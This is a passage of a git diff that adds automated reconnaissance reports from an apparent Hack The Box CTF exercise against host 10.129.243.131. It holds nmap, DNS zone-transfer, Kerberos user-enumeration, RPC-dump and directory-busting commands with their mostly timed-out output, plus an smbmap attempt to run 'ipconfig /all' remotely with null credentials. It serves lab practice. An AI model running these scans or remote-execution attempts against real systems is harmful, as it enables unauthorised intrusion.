at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.72 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md new file mode 100644 index 00000000..542cc3e4 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 445 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 2s + +PORT STATE SERVICE REASON VERSION +445/tcp filtered microsoft-ds no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.64 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md new file mode 100644 index 00000000..99d3b8c1 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md @@ -0,0 +1,66 @@ +```bash +smbmap -H 10.129.243.131 -P 445 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 445 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md new file mode 100644 index 00000000..cc01b66d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 464 --script=banner,krb5-enum-users -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 1s + +PORT STATE SERVICE REASON VERSION +464/tcp filtered kpasswd5 no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.44 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md new file mode 100644 index 00000000..24bdd4c6 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md @@ -0,0 +1,18 @@ +```bash +dig -p 53 -x 10.129.243.131 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_reverse-lookup.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_reverse-lookup.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131 +;; global options: +cmd +;; no servers could be reached + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md new file mode 100644 index 00000000..2633b124 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md @@ -0,0 +1,19 @@ +```bash +dig AXFR -p 53 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_zone-transfer.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_zone-transfer.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 +; (1 server found) +;; global options: +cmd +;; no servers could be reached + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md new file mode 100644 index 00000000..98ca9636 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md @@ -0,0 +1,23 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 2s + +PORT STATE SERVICE REASON VERSION +53/tcp filtered domain no-response + +Host script results: +|_dns-brute: Can't guess domain of "10.129.243.131"; use dns-brute.domain script argument. + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.81 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md new file mode 100644 index 00000000..e17fa24d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md @@ -0,0 +1,15 @@ +```bash +impacket-rpcdump -port 593 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt): + +``` +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Retrieving endpoint list from 10.129.243.131 +[-] Protocol failed: Could not connect: timed out +[*] No endpoints found. + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md new file mode 100644 index 00000000..c34ad83e --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md @@ -0,0 +1,3 @@ +```bash +curl -sSikf http://10.129.243.131:80/robots.txt +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md new file mode 100644 index 00000000..6a1b93eb --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md @@ -0,0 +1,60 @@ +```bash +curl -sSik http://10.129.243.131:80/ +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html): + +``` +HTTP/1.1 200 OK +Content-Type: text/html +Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT +Accept-Ranges: bytes +ETag: "0eaf6d7c895d71:0" +Server: Microsoft-IIS/10.0 +Date: Sat, 28 Oct 2023 12:50:12 GMT +Content-Length: 1034 + + + + + + Slandovia Energy + + + + + + + +
+ + + + +
+ +

MegaCorp

+

+ Slandovia Energy Grid +

+ +
+ + + + + + +
    + no results +
+
+ + + + + + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md new file mode 100644 index 00000000..a1d10f40 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md @@ -0,0 +1,18 @@ +```bash +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt): + +``` +200 GET 25l 72w 692c http://10.129.243.131/script.js +200 GET 215l 294w 3166c http://10.129.243.131/style.css +200 GET 41l 66w 1034c http://10.129.243.131/ +200 GET 41l 66w 1034c http://10.129.243.131/Index.html +200 GET 8l 168w 1092c http://10.129.243.131/LICENSE.txt +200 GET 1l 14w 116c http://10.129.243.131/Search.php +200 GET 41l 66w 1034c http://10.129.243.131/index.html +200 GET 8l 168w 1092c http://10.129.243.131/license.txt +200 GET 1l 14w 116c http://10.129.243.131/search.php + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md new file mode 100644 index 00000000..1aa59a75 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md @@ -0,0 +1,3 @@ +```bash +curl -sSikf http://10.129.243.131:80/.well-known/security.txt +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md new file mode 100644 index 00000000..80a14cd3 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:48 CEST for 1s + +PORT STATE SERVICE REASON VERSION +80/tcp filtered http no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 4.02 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md new file mode 100644 index 00000000..293f82bb --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md @@ -0,0 +1,10 @@ +```bash +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt): + +``` + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md new file mode 100644 index 00000000..9615301b --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md @@ -0,0 +1,3 @@ +```bash +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md new file mode 100644 index 00000000..24e4a3ff --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 88 --script=banner,krb5-enum-users -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 1s + +PORT STATE SERVICE REASON VERSION +88/tcp filtered kerberos-sec no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:48 2023 -- 1 IP address (1 host up) scanned in 3.64 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md new file mode 100644 index 00000000..3e43b008 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md @@ -0,0 +1,22 @@ +```bash +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 14:15:18 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 123 "--script=banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.056s latency). +Scanned at 2023-10-28 14:15:19 CEST for 10s + +PORT STATE SERVICE REASON VERSION +123/udp open ntp udp-response ttl 127 NTP v3 +| ntp-info: +|_ receive time stamp: 2023-10-28T12:15:20 + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:15:29 2023 -- 1 IP address (1 host up) scanned in 11.02 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md new file mode 100644 index 00000000..d1f597df --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md @@ -0,0 +1,29 @@ +```bash +dig -p 53 -x 10.129.243.131 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131 +;; global options: +cmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 16548 +;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 + +;; OPT PSEUDOSECTION: +; EDNS: version: 0, flags:; udp: 4000 +;; QUESTION SECTION: +;131.243.129.10.in-addr.arpa. IN PTR + +;; Query time: 4303 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:15:33 CEST 2023 +;; MSG SIZE rcvd: 56 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md new file mode 100644 index 00000000..e4993241 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md @@ -0,0 +1,21 @@ +```bash +dig AXFR -p 53 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 +; (1 server found) +;; global options: +cmd +;; Query time: 4299 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:15:33 CEST 2023 +;; MSG SIZE rcvd: 28 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md new file mode 100644 index 00000000..db514546 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md @@ -0,0 +1,40 @@ +```bash +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 14:15:18 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set. +Scanned at 2023-10-28 14:15:19 CEST for 116s + +PORT STATE SERVICE REASON VERSION +53/udp open domain? udp-response +| fingerprint-strings: +| DNS-SD: +| _services +| _dns-sd +| _udp +|_ local +| dns-nsec3-enum: +|_ DNSSEC NSEC3 not supported +|_dns-cache-snoop: 0 of 100 tested domains are cached. +| dns-nsec-enum: +|_ No NSEC records found +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CFB97%P=x86_64-pc-linux-gnu%r(AFS 